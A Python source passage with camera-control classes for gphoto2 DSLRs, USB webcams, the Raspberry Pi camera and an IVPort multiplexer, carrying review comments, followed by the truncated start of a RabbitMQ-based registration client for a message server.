    cmd, keys = self._get_cmd("get_image_quality")
    if cmd:
        self._read_stream(cmd.format(value))
@property
def image_size(self) -> list:
    """
    Image resolution in pixels as [width, height].

    Fix: ``keys`` was passed to :func:`get_value_from_stream` as a single
    list argument instead of being unpacked, so no key ever matched and the
    cached size was never updated from the camera.

    :getter: from camera (falls back to the cached value per dimension).
    :setter: to camera.
    :rtype: list
    """
    cmd, keys = self._get_cmd("get_image_size")
    if cmd:
        stream = self._read_stream(cmd)
        # unpack keys -- the parser expects individual key names.
        output = self.get_value_from_stream(stream, *keys)
        width, height = self._image_size
        for k, v in output.items():
            if "width" in k:
                width = v
            if "height" in k:
                height = v
        self._image_size = [width, height]
    return self._image_size
@image_size.setter
def image_size(self, value):
    """
    Set the camera resolution; *value* must be one of the configured
    [width, height] pairs in ``_image_size_list``.
    """
    assert type(value) in (list, tuple), "image size is not a list or tuple!"
    assert len(value) == 2, "image size doesnt have 2 elements width,height are required"
    requested = list(value)
    assert requested in self._image_size_list, "image size not in available image sizes"
    cmd, keys = self._get_cmd("set_image_size")
    if cmd:
        width, height = requested
        self._read_stream(cmd.format(width=width, height=height))
    self._image_size = requested
@property
def focus_mode(self) -> str:
    """
    TODO: this is broken, returns the dict of key: value not value
    Focus Mode
    When setting, the mode provided must be in 'focus_modes'
    :getter: from camera.
    :setter: to camera.
    :rtype: list
    """
    cmd, keys = self._get_cmd("get_focus_mode")
    if not cmd:
        return None
    stream_output = self._read_stream(cmd)
    # NOTE(review): ``keys`` is passed as one positional list rather than
    # unpacked (``*keys``), and ``stream_output`` may be None -- both look
    # suspect; confirm against get_value_from_stream before changing, since
    # the TODO above says this property is known-broken.
    return self.get_value_from_stream(stream_output, keys)['mode']
@focus_mode.setter
def focus_mode(self, mode: str):
    """Set the autofocus mode; ignored (with a message) if unsupported."""
    assert (self._autofocus_modes is not None)
    supported = [x.upper() for x in self._autofocus_modes]
    if str(mode).upper() not in supported:
        print("Focus mode not in list of supported focus modes, not setting.")
        return
    cmd, keys = self._get_cmd("set_focus_mode")
    if cmd:
        self._read_stream(cmd.format(mode=mode))
@property
def focus_position(self):
    """
    Focal position as an absolute value.

    Fixes: ``keys`` was passed unexpanded to :func:`get_value_from_stream`
    (no key ever matched), and ``next(iter(result))`` yielded a dict *key*
    (the field name) rather than the parsed value.

    :getter: from camera.
    :setter: to camera.
    :rtype: float
    """
    cmd, keys = self._get_cmd("get_focus")
    if not cmd:
        return None
    stream_output = self._read_stream(cmd)
    result = self.get_value_from_stream(stream_output, *keys)
    # return the first parsed value; large sentinel when nothing parsed.
    return next(iter(result.values()), float(99999))
@focus_position.setter
def focus_position(self, absolute_position):
    """
    Clamp *absolute_position* into the supported focus range and send it.

    Fix: the original guard was inverted -- when no "set_focus" command was
    configured it clamped the value and then called ``None.format(...)``
    (AttributeError), and when a command existed it skipped clamping
    entirely. Now: bail out early without a command, always clamp, then send.
    """
    self.logger.debug("Setting focus position to {}".format(absolute_position))
    cmd, key = self._get_cmd("set_focus")
    if not cmd:
        return
    assert (self._focus_range is not None and absolute_position is not None)
    # clamp into [min, max] before sending to the camera.
    absolute_position = min(self._focus_range[1], max(self._focus_range[0], absolute_position))
    self._read_stream(cmd.format(focus=absolute_position))
def focus(self):
    """
    Force the camera to refocus by cycling through every autofocus mode,
    restoring the original mode afterwards.
    """
    self.logger.debug("Focusing...")
    original_mode = self.focus_mode
    cmd, key = self._get_cmd("set_autofocus_mode")
    if not cmd or len(self._autofocus_modes) < 1:
        return
    # walk every supported mode, giving the camera time to settle on each.
    for af_mode in self._autofocus_modes:
        self.focus_mode = af_mode
        time.sleep(2)
    self.focus_mode = original_mode
    self._read_stream(cmd.format(mode=self._autofocus_modes[0]))
    time.sleep(2)
    self.logger.debug("Focus complete.")
@property
def focus_range(self):
    """
    Information about the focus of the camera.

    Fixes: the parsed result is a dict, which the original sliced directly
    (``values[2:0:-1]`` -> TypeError: unhashable slice); and ``keys`` was
    passed unexpanded. The values are now listed in parse order and sliced
    as the original intended, yielding [focus max, focus min].

    :return: [focus max, focus min] as parsed from the camera, or None
    :rtype: list
    """
    cmd, keys = self._get_cmd("get_focus_range")
    if not cmd:
        return None
    stream_output = self._read_stream(cmd)
    values = self.get_value_from_stream(stream_output, *keys)
    # dicts are not sliceable; take parsed values in order, then reverse
    # elements 2..1 as the original slice intended.
    ordered = list(values.values())
    return ordered[2:0:-1]
@property
def hfov_list(self):
    """
    Horizontal field-of-view values (degrees), one per zoom step.

    :getter: cached.
    :setter: cache.
    :rtype: list(float)
    """
    return self._hfov_list

@hfov_list.setter
def hfov_list(self, value):
    assert type(value) in (list, tuple), "must be either list or tuple"
    self._hfov_list = list(value)
@property
def vfov_list(self):
    """
    Vertical field-of-view values (degrees), one per zoom step.

    :getter: cached.
    :setter: cache.
    :rtype: list(float)
    """
    return self._vfov_list

@vfov_list.setter
def vfov_list(self, value):
    assert type(value) in (list, tuple), "must be either list or tuple"
    self._vfov_list = list(value)
@property
def hfov(self):
    """
    Horizontal field of view in degrees.

    :getter: cached value (interpolation from zoom is currently disabled).
    :setter: cache.
    :rtype: float
    """
    return self._hfov

@hfov.setter
def hfov(self, value: float):
    self._hfov = value
@property
def vfov(self):
    """
    Vertical field of view in degrees.

    :getter: cached value (interpolation from zoom is currently disabled).
    :setter: cache.
    :rtype: float
    """
    return self._vfov

@vfov.setter
def vfov(self, value: float):
    self._vfov = value
@property
def status(self) -> str:
    """
    Human-readable summary of the current focus position and range.

    :return: informative string of focus_pos and focus_range
    :rtype: str
    """
    template = "\nfocus_pos:\t{}\nfocus_range:\t{}"
    return template.format(self.focus_position, self.focus_range)
class GPCamera(Camera):
    """
    gphoto2-backed DSLR camera.

    Matches a physical camera by serial number; ``identifier`` and
    ``usb_address`` are resolved in :func:`re_init`.
    """

    def __init__(self, identifier: str = None, lock=Lock(), **kwargs):
        # NOTE(review): the default Lock() is evaluated once at definition
        # time, so every GPCamera constructed without an explicit lock shares
        # the same lock object -- confirm this serialisation is intended.
        self.lock = lock
        self._serialnumber = None
        # [bus, device] usb address, filled in by re_init().
        self.usb_address = [None, None]
        super(GPCamera, self).__init__(identifier, **kwargs)
        # NOTE(review): uses config.get here but config.getint in re_init --
        # verify the expected type of exposure_length.
        self.exposure_length = self.config.get('camera', "exposure")

    def re_init(self):
        """
        Re-initialises the camera.

        Scans attached gphoto2 cameras: with an identifier set, matches by
        serial number; otherwise adopts the first camera that reports one.

        :raises IOError: if no matching (or no) camera is found.
        """
        super(GPCamera, self).re_init()
        with self.lock:
            serialnumber = None
            camera = None
            if self.identifier is not None:
                for cam in gp.list_cameras():
                    serialnumber = cam.status.serialnumber
                    if serialnumber in self.identifier:
                        camera = cam
                        break
                else:
                    # loop completed without a break: nothing matched.
                    raise IOError("Camera not available or connected")
            else:
                for cam in gp.list_cameras():
                    try:
                        serialnumber = str(cam.status.serialnumber)
                        self.identifier = SysUtil.default_identifier(prefix=serialnumber)
                        camera = cam
                        break
                    except:
                        # skip cameras that fail to report a serial number.
                        pass
                else:
                    raise IOError("No cameras available")
            self.usb_address = camera._usb_address
            self._serialnumber = serialnumber
            self.logger.info("Camera detected at usb port {}:{}".format(*self.usb_address))
            self.exposure_length = self.config.getint("camera", "exposure")

    def get_exif_fields(self):
        """
        This is meant to get the exif fields for the image if we want to manually save them.
        This is incomplete.

        :return: dictionary of exif fields.
        :rtype: dict
        """
        exif = super(GPCamera, self).get_exif_fields()
        try:
            camera = self._get_camera()
            exif['Exif.Image.Make'] = getattr(camera.status, 'manufacturer', 'Make')
            exif['Exif.Image.Model'] = getattr(camera.status, 'cameramodel', 'Model')
            exif['Exif.Image.BodySerialNumber'] = self.eos_serial_number
            exif['Exif.Image.CameraSerialNumber'] = self.serial_number
            # iso/aperture may be unsupported on some bodies; best-effort only.
            try:
                exif['Exif.Photo.ISOSpeed'] = self['iso'].value
            except:
                pass
            try:
                exif['Exif.Photo.Aperture'] = self['aperture'].value
            except:
                pass
        except Exception as e:
            self.logger.error("Couldnt get full exif data. {}".format(str(e)))
        return exif

    def _get_camera(self):
        """
        Acquire the gphoto2 camera handle, preferring the cached usb address
        and falling back to a scan by serial number.

        :raises FileNotFoundError: if no attached camera matches.
        """
        with self.lock:
            try:
                camera = gp.Camera(bus=self.usb_address[0], device=self.usb_address[1])
                if self._serialnumber == camera.status.serialnumber:
                    self.logger.debug("Camera matched for {}:{}".format(*self.usb_address))
                    return camera
            except Exception as e:
                self.logger.info("Camera wasnt at the correct usb address or something: {}".format(str(e)))
            # fallback: scan every camera for a matching serial number.
            for camera in gp.list_cameras():
                try:
                    if camera.status.serialnumber == self._serialnumber:
                        return camera
                except Exception as e:
                    self.logger.info("Couldnt acquire lock for camera. {}".format(str(e)))
            else:
                raise FileNotFoundError("Camera cannot be found")

    def capture_image(self, filename=None):
        """
        Capture method for DSLRs.

        Some contention exists around this method, as its definitely not the easiest thing to have operate robustly.
        :func:`GPCamera._cffi_capture` is how it _should_ be done, however that method is unreliable and causes many
        crashes when in real world timelapse situations.
        This method calls gphoto2 directly, which makes us dependent on gphoto2 (not just libgphoto2 and gphoto2-cffi),
        and there is probably some issue with calling gphoto2 at the same time like 5 times, maybe dont push it.

        :param filename: filename without extension to capture to.
        :return: list of filenames (of captured images) if filename was specified, otherwise a numpy array of the image.
        :rtype: numpy.array or list
        """
        import subprocess
        import glob
        # the %C filename parameter given to gphoto2 will automatically expand the number of image types that the
        # camera is set to capture to.
        # this one shouldnt really be used.
        fn = "{}-temp.%C".format(self.camera_name)
        cmd = [
            "gphoto2",
            "--port=usb:{bus:03d},{dev:03d}".format(bus=self.usb_address[0], dev=self.usb_address[1]),
            "--set-config=capturetarget=0",  # capture to sdram
            "--force-overwrite",  # if the target image exists. If this isnt present gphoto2 will lock up asking
            "--capture-image-and-download",  # must capture & download in the same call to use sdram target.
            '--filename={}'.format(fn)
        ]
        self.logger.debug("Capture start: {}".format(fn))
        for tries in range(6):
            self.logger.debug("CMD: {}".format(" ".join(cmd)))
            try:
                output = subprocess.check_output(cmd, stderr=subprocess.STDOUT, universal_newlines=True)
                if "error" in output.lower():
                    # NOTE(review): CalledProcessError's first positional is
                    # the integer returncode; passing a string works but is
                    # unconventional -- confirm nothing reads e.returncode.
                    raise subprocess.CalledProcessError("non-zero exit status", cmd=cmd, output=output)
                else:
                    # log success of capture
                    self.logger.info("GPCamera capture success: {}".format(fn))
                    for line in output.splitlines():
                        self.logger.debug("GPHOTO2: {}".format(line))
                    # glob up captured images
                    filenames = glob.glob(fn.replace("%C", "*"))
                    # if there are no captured images, log the error
                    if not len(filenames):
                        self.logger.error("capture resulted in no files.")
                    else:
                        # try and load an image for the last_image.jpg resized doodadery
                        try:
                            first = filenames[0] if filenames else None
                            self._image = cv2.cvtColor(cv2.imread(first, cv2.IMREAD_COLOR), cv2.COLOR_BGR2RGB)
                        except Exception as e:
                            self.logger.error("Failed to set current image: {}".format(str(e)))
                        if filename:
                            # return the filenames of the spooled images if files were requestsed.
                            return filenames
                        else:
                            # otherwise remove the temporary files that we created in order to fill self._image
                            for fp in filenames:
                                os.remove(fp)
                            # and return self._image
                            return self._image
            except subprocess.CalledProcessError as e:
                self.logger.error("failed {} times".format(tries))
                for line in e.output.splitlines():
                    if not line.strip() == "" and "***" not in line:
                        self.logger.error(line.strip())
        else:
            self.logger.critical("Really bad stuff happened. too many tries capturing.")
            if filename:
                return []
        return None

    def _cffi_capture(self, filename=None):
        """
        old cffi capture. very unreliable.
        Causes a memory leak somewhere that I cant find.

        :param filename: filename without extension to capture to.
        :return: list of filenames (of captured images) if filename was specified, otherwise a numpy array of the image.
        :rtype: numpy.array or list
        """
        st = time.time()
        camera = None
        for x in range(10):
            try:
                camera = self._get_camera()
                successes = list()
                size = 0
                for idx, image in enumerate(list(camera.capture(img_expect_count=2, timeout=20))):
                    with image:
                        try:
                            size += image.size
                            # keep the camera's extension; use our filename if given.
                            fn = (filename or os.path.splitext(image.filename)[0]) + os.path.splitext(image.filename)[-1]
                            if idx == 0:
                                self._image = cv2.imdecode(numpy.fromstring(image.read(), numpy.uint8), cv2.IMREAD_COLOR)
                            image.save(fn)
                            successes.append(fn)
                            try:
                                image.remove()
                            except Exception as e:
                                self.logger.info("Couldnt remove image for some reason (probably already gone)")
                            del image
                            self.logger.debug("Captured and stored: {}".format(fn))
                        except:
                            # cant do anything if failure here.
                            pass
                self.logger.debug("Took {0:.2f}s to capture".format(time.time() - st))
                self.logger.debug("Filesize {}".format(size))
                if filename:
                    return successes
                return self._image
            except Exception as e:
                self.logger.error("Error Capturing with DSLR: {}".format(str(e)))
                time.sleep(1)
            finally:
                if camera:
                    camera.release()
        else:
            self.logger.fatal("(10) Tries capturing failed")
            if filename:
                return []
            return None

    def __getitem__(self, item):
        # first matching config field, or None when absent.
        return next(iter(self._config(item)), None)

    @property
    def serial_number(self) -> str:
        """
        returns the current serialnumber for the camera.
        """
        return self._serialnumber

    def focus(self):
        """
        this is meant to trigger the autofocus. currently not in use because it causes some distortion in the images.
        """
        camera = self._get_camera()
        try:
            pass
            # camera._get_config()['actions']['eosremoterelease'].set("Release Full")
            # camera._get_config()['actions']['eosremoterelease'].set("Press 1")
            # camera._get_config()['actions']['eosremoterelease'].set("Release Full")
        except Exception as e:
            print(str(e))

    @property
    def eos_serial_number(self) -> str or None:
        """
        returns the eosserialnumber of supported cameras, otherwise the normal serialnumber
        """
        camera = self._get_camera()
        sn = vars(camera.status).get("eosserialnumber", self.serial_number)
        camera.release()
        return sn

    def _config(self, field: str) -> list:
        """
        searches for a field from the camera config.

        :param field: string to search
        :return: list of matching fields, should mostly be len 1
        """
        fields_found = []
        camera = self._get_camera()
        config = camera._get_config()
        camera.release()
        return list(nested_lookup(field, config))
class USBCamera(Camera):
    """
    USB (v4l) webcam camera class, backed by OpenCV's VideoCapture.
    """

    @classmethod
    def stream_thread(cls):
        """
        usb camera stream thread.
        TODO: Needs to be aware of multiple cameras.
        """
        print("ThreadStartup ...")
        # NOTE(review): VideoCapture() is constructed but open() is never
        # called here, so cam.read() presumably fails -- confirm whether the
        # device index should be opened before the loop.
        cam = cv2.VideoCapture()
        # camera setup
        # let camera warm up
        time.sleep(2)
        # properties 3/4 are frame width/height; oversized values make the
        # driver clamp to its maximum resolution.
        cam.set(3, 30000)
        cam.set(4, 30000)
        print("Started up!")
        while True:
            ret, frame = cam.read()
            frame = cv2.imencode(".jpg", frame)
            # store the encoded jpeg bytes for stream consumers.
            cls._frame = frame[1].tostring()
            # if there hasn't been any clients asking for frames in
            # the last 10 seconds stop the thread
            if time.time() - cls._last_access > 10:
                print("ThreadShutdown")
                break
        cls._thread = None

    def __init__(self, identifier, sys_number, **kwargs):
        """
        USB camera init. must have a sys_number (the 0 from /dev/video0) to capture from

        :param identifier: identifier for the webcamera
        :param sys_number: system device number of device to use
        :param kwargs:
        """
        # only webcams have a v4l sys_number.
        self.sys_number = int(sys_number)
        self.video_capture = None
        try:
            self.video_capture = cv2.VideoCapture()
        except Exception as e:
            self.logger.fatal("couldnt open video capture device on {}".format(self.sys_number))
        super(USBCamera, self).__init__(identifier, **kwargs)

    def re_init(self):
        """
        re-initialisation of webcamera
        todo: fix release of camera otherwise it gets locked forever.
        """
        super(USBCamera, self).re_init()
        self._assert_capture_device()
        try:
            if not self.video_capture.open(self.sys_number):
                self.logger.fatal("Couldnt open a video capture device on {}".format(self.sys_number))
        except Exception as e:
            self.logger.fatal("Couldnt open a video capture device")
        # 3 -> width 4->height 5->fps just max them out to get the highest resolution.
        self.video_capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 100000)
        self.video_capture.set(cv2.CAP_PROP_FRAME_WIDTH, 100000)
        self.logger.info("Capturing at {w}x{h}".format(w=self.video_capture.get(cv2.CAP_PROP_FRAME_WIDTH),
                                                      h=self.video_capture.get(cv2.CAP_PROP_FRAME_HEIGHT)))

    def stop(self):
        """
        releases the video device and stops the camera thread
        """
        try:
            self.video_capture.release()
        except Exception as e:
            self.logger.error("Couldnt release cv2 device {}".format(str(e)))
        self.stopper.set()

    def _assert_capture_device(self):
        """
        ensures the capture device is open and valid.
        """
        try:
            if not self.video_capture:
                self.video_capture = cv2.VideoCapture()
            if not self.video_capture.isOpened():
                if not self.video_capture.open(self.sys_number):
                    raise IOError("VideoCapture().open({}) failed.".format(self.sys_number))
        except Exception as e:
            self.logger.error("Capture device could not be opened {}".format(str(e)))

    def capture_image(self, filename=None):
        """
        captures an image from the usb webcam.
        Writes some limited exif data to the image if it can.

        :param filename: filename to output without excension
        :return: list of image filenames if filename was specified, otherwise a numpy array.
        :rtype: numpy.array or list
        """
        st = time.time()
        # retry up to 50 times: some drivers need a few reads before a frame
        # is actually delivered.
        for _ in range(50):
            try:
                ret, im = self.video_capture.read()
                if ret:
                    self._image = im
                    break
                time.sleep(0.1)
            except Exception as e:
                self.logger.error("Error webcam capture did not read {}".format(str(e)))
        else:
            # no read ever succeeded.
            return None
        if filename:
            try:
                filenames = self.encode_write_np_array(self._image, filename)
                self.logger.debug("Took {0:.2f}s to capture".format(time.time() - st))
                return filenames
            except Exception as e:
                self.logger.error("Could not write image {}".format(str(e)))
        else:
            self.logger.debug("Took {0:.2f}s to capture".format(time.time() - st))
            return self._image
        return None
class PiCamera(Camera):
    """
    Picamera extension to the Camera abstract class.
    """

    @classmethod
    def stream_thread(cls):
        """
        Streaming thread member.
        uses :func:`picamera.PiCamera.capture_continuous` to stream data from the rpi camera video port.
        :func:`time.sleep` added to rate limit a little bit.
        """
        import picamera
        print("start thread")
        try:
            with picamera.PiCamera() as camera:
                # camera setup
                camera.resolution = (640, 480)
                # camera.hflip = True
                # camera.vflip = True
                # let camera warm up
                camera.start_preview()
                time.sleep(2)
                stream = BytesIO()
                for foo in camera.capture_continuous(stream, 'jpeg',
                                                     use_video_port=True):
                    # store frame
                    stream.seek(0)
                    cls._frame = stream.read()
                    # reset stream for next frame
                    stream.seek(0)
                    stream.truncate()
                    # if there hasn't been any clients asking for frames in
                    # the last 10 seconds stop the thread
                    time.sleep(0.01)
                    if time.time() - cls._last_access > 1:
                        break
        except Exception as e:
            print("Couldnt acquire camera")
        print("Closing Thread")
        cls._thread = None

    def set_camera_settings(self, camera):
        """
        Sets the camera resolution to the max resolution

        if the config provides camera/height or camera/width attempts to set the resolution to that.
        if the config provides camera/iso, attempts to set the iso to that.
        if the config provides camera/shutter_speed, sets the shutterspeed to that.

        :param picamera.PiCamera camera: picamera camera instance to modify
        """
        try:
            camera.resolution = camera.MAX_RESOLUTION
            if self.config.has_option("camera", "width") and self.config.has_option("camera", "height"):
                camera.resolution = (self.config.getint("camera", "width"),
                                     self.config.getint("camera", "height"))
            if self.config.has_option("camera", "shutter_speed"):
                camera.shutter_speed = self.config.getfloat("camera", "shutter_speed")
            if self.config.has_option("camera", "iso"):
                camera.iso = self.config.getint("camera", "iso")
        except Exception as e:
            self.logger.error("error setting picamera settings: {}".format(str(e)))

    def capture_image(self, filename: str = None) -> numpy.array:
        """
        Captures image using the Raspberry Pi Camera Module, at either max resolution, or resolution
        specified in the config file.

        Writes images disk using :func:`encode_write_np_array`, so it should write out to all supported image formats
        automatically.

        :param filename: image filename without extension
        :return: :func:`numpy.array` if filename not specified, otherwise list of files.
        :rtype: numpy.array
        """
        st = time.time()
        try:
            # NOTE(review): `picamera` is imported locally in stream_thread
            # but referenced bare here -- presumably imported at module
            # level outside this view; verify, otherwise this NameErrors.
            with picamera.PiCamera() as camera:
                with picamera.array.PiRGBArray(camera) as output:
                    time.sleep(2)  # Camera warm-up time
                    self.set_camera_settings(camera)
                    time.sleep(0.2)
                    self._image = numpy.empty((camera.resolution[1], camera.resolution[0], 3), dtype=numpy.uint8)
                    camera.capture(output, 'rgb')
                    self._image = output.array
                    # picamera delivers rgb; convert for the bgr-based pipeline.
                    self._image = cv2.cvtColor(self._image, cv2.COLOR_BGR2RGB)
                    if filename:
                        filenames = self.encode_write_np_array(self._image, filename)
                        self.logger.debug("Took {0:.2f}s to capture".format(time.time() - st))
                        return filenames
                    else:
                        self.logger.debug("Took {0:.2f}s to capture".format(time.time() - st))
        except Exception as e:
            self.logger.critical("EPIC FAIL, trying other method. {}".format(str(e)))
        return self._image
class IVPortCamera(PiCamera):
    """
    IVPort class for multiple capture.
    the 4 tags on the IVport are setout below.
    """
    # index (across all soldered groups) of the camera currently selected.
    current_camera_index = 0
    # these are for the video streaming
    select = 7
    # gpio enable pin pairs per IVPort group tag.
    enable_pins = {
        "A": [11, 12],
        "B": [15, 16],
        "C": [21, 22],
        "D": [23, 24]
    }
    # [select, enable1, enable2] levels for each of the 4 cameras on a board.
    TRUTH_TABLE = [
        [False, False, True],
        [True, False, True],
        [False, True, False],
        [True, True, False]
    ]
    gpio_groups = ("B",)

    def __init__(self,
                 identifier: str = None,
                 queue: deque = None,
                 gpio_group: tuple = ("B",),
                 camera_number: int = None, **kwargs):
        """
        special __init__ for the IVport to set the gpio enumeration

        This controls which gpio are on or off to select the camera and which camera group has been soldered on the
        ivport. Multiple camera groups can be specified, and they will be enumerated in alphabetical order.

        :param identifier: string identifier for the camera
        :type identifier: str
        :param queue: communication queue for the camera to communicate with the updater
        :type queue: deque
        :param kwargs:
        """
        self.__class__.gpio_groups = sorted(gpio_group)
        if camera_number is None:
            super(IVPortCamera, self).__init__(identifier=identifier, queue=queue, **kwargs)
        else:
            # NOTE(review): with an explicit camera_number, the superclass
            # __init__ is never invoked -- confirm this partial construction
            # is intended.
            self.__class__.current_camera_index = camera_number
            IVPortCamera.switch(idx=self.__class__.current_camera_index)

    def setup(self):
        """
        sets up gpio for IVPort
        """
        super(IVPortCamera, self).setup()
        # switch to the current camera index.
        IVPortCamera.switch(idx=self.__class__.current_camera_index)

    @classmethod
    def switch(cls, idx: int = None):
        """
        switches the IVPort to a new camera
        with no index, switches to the next camera, looping around from the beginning

        :param idx: index to switch the camera to (optional)
        :type idx: int
        """
        time.sleep(1)
        # import RPi.GPIO as GPIO
        # advance by default; an explicit idx overrides the increment.
        cls.current_camera_index += 1
        if idx is not None:
            cls.current_camera_index = idx
        cls.current_camera_index %= (len(IVPortCamera.TRUTH_TABLE) * len(cls.gpio_groups))
        # GPIO.setwarnings(False)
        # GPIO.setmode(GPIO.BOARD)
        # GPIO.setup(IVPortCamera.select, GPIO.OUT)
        # current groups determined by the camera index / number of cameras per board (truth table len)
        current_group = cls.gpio_groups[int(cls.current_camera_index / len(IVPortCamera.TRUTH_TABLE))]
        current_pins = cls.enable_pins[current_group]
        print("Switching to camera {}: {}".format(current_group, cls.current_camera_index))
        # GPIO.setup(current_pins[0], GPIO.OUT)
        # GPIO.setup(current_pins[1], GPIO.OUT)
        # per camera index, current camera index mod the number of cameras per board
        truth_table_idx = cls.current_camera_index % len(IVPortCamera.TRUTH_TABLE)
        pin_values = [
            IVPortCamera.TRUTH_TABLE[truth_table_idx][0],
            IVPortCamera.TRUTH_TABLE[truth_table_idx][1],
            IVPortCamera.TRUTH_TABLE[truth_table_idx][2]
        ]
        # GPIO.output(IVPortCamera.select, pin_values[0])
        # GPIO.output(IVPortCamera.enable_pins[0], pin_values[1])
        # GPIO.output(IVPortCamera.enable_pins[1], pin_values[2])
        print(pin_values)

    def capture_image(self, filename: str = None) -> list:
        """
        capture method for IVPort
        iterates over the number of cameras

        :return: :func:`numpy.array` if filename not specified, otherwise list of files.
        :rtype: numpy.array or list
        """
        filenames = []
        st = time.time()
        import picamera
        import numpy as np
        try:
            with picamera.PiCamera() as camera:
                with picamera.array.PiRGBArray(camera) as _image:
                    camera.start_preview()
                    time.sleep(2)  # Camera warm-up time
                    self.set_camera_settings(camera)
                    w, h = camera.resolution
                    # one wide canvas with the per-camera frames side by side.
                    self._image = numpy.empty((h, w * len(IVPortCamera.TRUTH_TABLE), 3), dtype=numpy.uint8)
                    for c in range(0, len(IVPortCamera.TRUTH_TABLE)):
                        try:
                            ast = time.time()
                            IVPortCamera.switch(idx=c)
                            camera.capture(_image, 'rgb')
                            if filename:
                                image_numbered = "{}-{}{}".format(os.path.splitext(filename)[0], str(c),
                                                                  os.path.splitext(filename)[-1])
                                # NOTE(review): encode_write_np_array appears to
                                # return a list, so filenames becomes a list of
                                # lists -- confirm callers expect that.
                                filenames.append(self.encode_write_np_array(_image.array, image_numbered))
                                self.logger.debug(
                                    "Took {0:.2f}s to capture image #{1}".format(time.time() - ast, str(c)))
                            # paste this camera's frame into its slot in the canvas.
                            offset = c * w
                            self._image[0:h, offset: offset + w] = _image.array
                            self._image = cv2.cvtColor(self._image, cv2.COLOR_BGR2RGB)
                        except Exception as e:
                            self.logger.critical("Couldnt capture (IVPORT) with camera {} {}".format(str(c), str(e)))
                        _image.truncate(0)
                        time.sleep(0.1)
                    # NOTE(review): `ast` is the last per-camera start time, so
                    # this reports only the final camera's duration, not the total.
                    self.logger.debug("Took {0:.2f}s to capture all images".format(time.time() - ast))
                    if filename:
                        return filenames
                    else:
                        return self._image
        except Exception as e:
            self.logger.error("Couldnt acquire picam: {}".format(str(e)))
"""
Threaded implementations
"""
class ThreadedCamera(Thread):
    """
    Mixin that runs a Camera subclass in its own daemon thread and re-inits
    it when its config file changes.
    """

    def __init__(self, *args, **kwargs):
        # name the thread after the camera identifier when one exists.
        if hasattr(self, "identifier"):
            Thread.__init__(self, name=self.identifier)
        else:
            Thread.__init__(self)
        print("Threaded startup")
        # super(self.__class__, self).__init__(*args, **kwargs)
        self.daemon = True
        # re-initialise the camera whenever its config file changes on disk.
        if hasattr(self, "config_filename") and hasattr(self, "re_init"):
            SysUtil().add_watch(self.config_filename, self.re_init)
class ThreadedGPCamera(ThreadedCamera, GPCamera):
    """Threaded variant of :class:`GPCamera`."""

    def __init__(self, *args, **kwargs):
        GPCamera.__init__(self, *args, **kwargs)
        super(ThreadedGPCamera, self).__init__(*args, **kwargs)

    def run(self):
        # super(GPCamera, ...) deliberately skips past GPCamera in the MRO --
        # presumably to reach the base Camera capture loop rather than
        # Thread.run; confirm against the Camera base class.
        super(GPCamera, self).run()
class ThreadedIPCamera(ThreadedCamera, IPCamera):
    """Threaded variant of :class:`IPCamera`."""

    def __init__(self, *args, **kwargs):
        IPCamera.__init__(self, *args, **kwargs)
        super(ThreadedIPCamera, self).__init__(*args, **kwargs)

    def run(self):
        # skips past IPCamera in the MRO -- presumably to the base Camera
        # capture loop rather than Thread.run; confirm.
        super(IPCamera, self).run()
class ThreadedUSBCamera(ThreadedCamera, USBCamera):
    """Threaded variant of :class:`USBCamera`."""

    def __init__(self, *args, **kwargs):
        USBCamera.__init__(self, *args, **kwargs)
        super(ThreadedUSBCamera, self).__init__(*args, **kwargs)

    def run(self):
        # skips past USBCamera in the MRO -- presumably to the base Camera
        # capture loop rather than Thread.run; confirm.
        super(USBCamera, self).run()
class ThreadedPiCamera(ThreadedCamera, PiCamera):
    """PiCamera that runs its capture loop on a background daemon thread."""
    def __init__(self, *args, **kwargs):
        # Initialise the camera first, then the thread machinery.
        PiCamera.__init__(self, *args, **kwargs)
        super(ThreadedPiCamera, self).__init__(*args, **kwargs)
    def run(self):
        # NOTE(review): super(PiCamera, self) resolves to the class *after*
        # PiCamera in the MRO, not to PiCamera itself — confirm intended.
        super(PiCamera, self).run()
class ThreadedIVPortCamera(ThreadedCamera, IVPortCamera):
    """IVPortCamera that runs its capture loop on a background daemon thread."""
    def __init__(self, *args, **kwargs):
        # Initialise the camera first, then the thread machinery.
        IVPortCamera.__init__(self, *args, **kwargs)
        super(ThreadedIVPortCamera, self).__init__(*args, **kwargs)
    def run(self):
        # NOTE(review): super(IVPortCamera, self) resolves to the class *after*
        # IVPortCamera in the MRO, not to IVPortCamera itself — confirm intended.
        super(IVPortCamera, self).run()
|
bms_client.py | #!/usr/bin/env python
"""
Copyright 2014 The Trustees of Princeton University
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import pika
import json
import string
import random
import threading
# Exchange and routing key used for registration (lease) requests.
BMS_REGISTRATION_EXCHANGE = 'bms_registrations'
BMS_REGISTRATION_QUEUE = 'bms_registrations'
# Re-send the registration message every 5 minutes to keep the lease alive.
BMS_REREGISTRATION_SEC = 5*60
"""
Interface class to iPlant Border Message Server
"""
class bms_registration_result_client(object):
    """Identity of the client (user + application) named in a registration."""

    def __init__(self, user_id=None, application_name=None):
        self.user_id = user_id
        self.application_name = application_name

    @classmethod
    def fromDict(cls, dictionary):
        """Build an instance from a decoded JSON 'client' dictionary."""
        return bms_registration_result_client(dictionary['user_id'],
                                              dictionary['application_name'])

    def __repr__(self):
        return "<bms_registration_result_client %s %s>" % (self.user_id,
                                                           self.application_name)
class bms_registration_result(object):
    """Parsed BMS registration (lease) response message."""

    def __init__(self, client=None, lease_start=0, lease_expire=0):
        # client: a bms_registration_result_client describing the lease holder.
        self.client = client
        self.lease_start = lease_start
        self.lease_expire = lease_expire

    @classmethod
    def fromJson(cls, json_string):
        """Parse a JSON registration message; return None if it is not one."""
        if bms_registration_result.isRegistrationJson(json_string):
            msg = json.loads(json_string)
            return bms_registration_result(client=bms_registration_result_client.fromDict(msg['client']),
                                           lease_start=msg['lease_start'],
                                           lease_expire=msg['lease_expire'])
        else:
            return None

    @classmethod
    def isRegistrationJson(cls, json_string):
        """Return True if json_string looks like a registration message.

        This is used as a predicate on arbitrary message bodies (see
        bms_client._onMessage), so malformed JSON or a non-dict payload
        must yield False rather than raising (previously json.loads could
        raise ValueError and the membership tests could raise TypeError).
